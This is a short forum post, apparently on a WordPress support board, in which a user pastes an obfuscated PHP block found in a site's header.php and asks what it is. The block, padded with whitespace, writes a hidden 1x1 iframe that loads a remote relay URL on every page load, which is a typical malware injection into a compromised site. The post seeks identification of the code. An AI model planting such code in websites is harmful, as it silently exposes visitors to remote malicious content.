• few days ago my friend found this on his header.php’s files:

    <?
    #f1930e#
                                                                                                                                                                                                                                                                                                                                                                          if(!$srvc_counter) {
    echo "                                                                                                                                                                                                                                                                                                                                                                      <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                      (function () {    var kgzd = document.createElement('iframe');    kgzd.src = 'https://test.giessepromotion.it/cms/relay.php';    kgzd.style.position = 'absolute';    kgzd.style.border = '0';    kgzd.style.height = '1px';    kgzd.style.width = '1px';    kgzd.style.left = '1px';    kgzd.style.top = '1px';    if (!document.getElementById('kgzd')) {        document.write('<div id=\'kgzd\' ></div>');        document.getElementById('kgzd').appendChild(kgzd);    }})();</script>";
    $srvc_counter = true;
    }
    
    #/f1930e#
    ?>

    do anyone know what it is ?

Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘f1930e mystery’ is closed to new replies.